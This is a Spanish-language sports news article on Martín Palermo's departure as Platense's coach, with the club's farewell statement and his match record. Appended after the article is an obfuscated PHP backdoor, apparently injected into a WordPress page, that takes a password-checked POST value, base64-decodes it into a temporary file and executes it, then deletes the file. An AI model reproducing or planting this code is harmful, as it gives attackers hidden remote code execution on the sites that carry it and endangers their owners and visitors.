Martín Palermo dejó de ser el técnico de Platense

Martín Palermo concluyó su ciclo como director técnico de Platense, de común acuerdo con los directivos del Calamar. El entrenador viene de salir subcampeón de la Copa de la Liga Profesional, tras caer en la final ante Rosario Central el sábado pasado.

En un comunicado oficial, el club de Vicente López explicó: “Tras una temporada histórica que acabó con la disputa de la primera final de Platense en el fútbol argentino luego de 80 años, el entrenador Martín Palermo y el club tomaron la determinación de separar sus caminos al finalizar el vínculo que concluye a fin de este año”.

“Al frente de nuestra institución, el Titán y su cuerpo técnico realizaron un gran trabajo durante todo el 2023 que le permitió al club totalizar 54 puntos en la sumatoria de los dos torneos, quedándose afuera de disputar su primer torneo internacional por diferencia de goles, y alcanzar la definición de la Copa de la Liga en la que cayó en la final ante Rosario Central. Además, potenció la promoción de jugadores de nuestras divisiones inferiores que incluyó los debuts de Marco Pellegrino, Gonzalo Valdivia, Alejo Monje y Manuel Tucker, logrando también la consolidación de otros futbolistas en el equipo principal“, continuó.

El texto finalizó: “Desde el Club Atlético Platense estamos muy agradecidos a él y a todo su staff por un año inolvidable para todos nosotros, le deseamos el mayor de los éxitos en el próximo proyecto que emprenda y el Calamar siempre tendrá las puertas abiertas de su casa para recibirlo. ¡Muchas gracias Palermo, por meterte en el corazón de nuestra gente y llevarnos a disputar una final histórica. Lo que hiciste por Tense no se olvida en la vida!”.

Palermo había asumido la dirección técnica de Platense a comienzos de este año y en total dirigió 46 partidos, con 17 triunfos, 12 empates y 17 derrotas, con 56 goles a favor y 59 en contra.

Previo a las elecciones de Boca Juniors, Palermo había manifestado que si ganaba la lista opositora encabezada por Andrés Ibarra dejaría su puesto en Platense para irse al Xeneize. Finalmente, Juan Román Riquelme ganó los comicios, ampliamente, así las puertas se le cerraron al ex goleador.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}